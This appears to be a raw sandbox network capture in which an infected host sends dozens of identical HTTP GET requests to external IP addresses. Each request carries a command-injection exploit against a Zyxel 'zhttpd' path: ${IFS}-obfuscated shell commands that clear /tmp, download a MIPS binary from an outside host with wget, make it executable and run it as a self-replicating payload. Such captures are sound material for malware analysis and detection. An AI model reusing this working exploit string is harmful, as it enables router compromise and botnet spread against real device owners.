                                                      Feb 2, 2024 06:35:48.539609909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3339192.168.2.1457022101.104.244.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539649963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3340192.168.2.143497486.113.155.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539680004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3341192.168.2.146014487.83.204.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539709091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3342192.168.2.1442740217.141.104.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539763927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3343192.168.2.1440476204.236.75.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539800882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3344192.168.2.145158427.156.165.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539838076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3345192.168.2.14484041.55.64.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539870977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3346192.168.2.145818274.171.163.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539915085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3347192.168.2.144217894.66.79.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539953947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3348192.168.2.1436672164.11.252.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539992094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3349192.168.2.1442720159.101.236.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540054083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3350192.168.2.145567281.178.107.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540091991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3351192.168.2.144650671.207.29.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540129900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3352192.168.2.1434090176.223.25.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540163040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3353192.168.2.145220032.35.183.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540204048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3354192.168.2.146028846.17.140.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540241957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3355192.168.2.1449134205.161.80.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540285110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3356192.168.2.1434078167.135.251.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540309906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3357192.168.2.1433260149.54.89.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540349960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3358192.168.2.1453966101.99.147.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540405035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3359192.168.2.1450498121.120.167.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540447950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3360192.168.2.1453736156.202.227.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540486097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3361192.168.2.145006691.66.114.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540524960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3362192.168.2.1450432210.128.14.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540563107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3363192.168.2.1437336194.171.149.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540611982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3364192.168.2.1444198164.206.235.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540647030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3365192.168.2.145534213.250.14.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540683985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3366192.168.2.1436348152.153.86.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540714979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3367192.168.2.144128499.199.221.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540766954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3368192.168.2.143930873.104.185.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540796041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3369192.168.2.1453050188.179.51.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540837049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3370192.168.2.1444840123.213.77.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540896893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3371192.168.2.14427165.22.120.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540920973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3372192.168.2.1436030105.84.237.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.540962934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3373192.168.2.145240614.88.223.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541013002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3374192.168.2.1438746172.221.46.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541060925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3375192.168.2.144468497.54.218.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541094065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3376192.168.2.145244014.139.75.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541137934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3377192.168.2.14371744.173.174.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541167021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3378192.168.2.145736619.171.37.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541213989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3379192.168.2.1454588167.246.242.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541254997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3380192.168.2.143431670.87.114.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541286945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3381192.168.2.1455694169.56.184.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541335106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3382192.168.2.143515870.170.97.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541374922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3383192.168.2.1444346189.101.200.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541410923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3384192.168.2.1441362150.47.222.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541450977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3385192.168.2.1459012118.52.106.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541491985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3386192.168.2.1446036220.228.236.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541538954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3387192.168.2.1441712130.248.12.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541589022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3388192.168.2.143822679.192.166.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541601896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3389192.168.2.1455746101.236.236.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541640997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3390192.168.2.1442088221.14.34.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541675091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3391192.168.2.1447986121.214.181.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541711092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3392192.168.2.1452220134.146.53.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541745901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3393192.168.2.1448388223.244.141.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541790009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3394192.168.2.144911825.160.0.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541834116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3395192.168.2.144648097.145.251.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541878939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3396192.168.2.1450402165.208.254.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541920900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3397192.168.2.14418889.94.91.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541945934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3398192.168.2.1456442178.136.80.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.541975021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3399192.168.2.1442752167.198.127.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.542045116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3400192.168.2.1446784111.111.238.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.545551062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3401192.168.2.1452080107.178.170.20137215
                                                      TimestampBytes transferredDirectionData
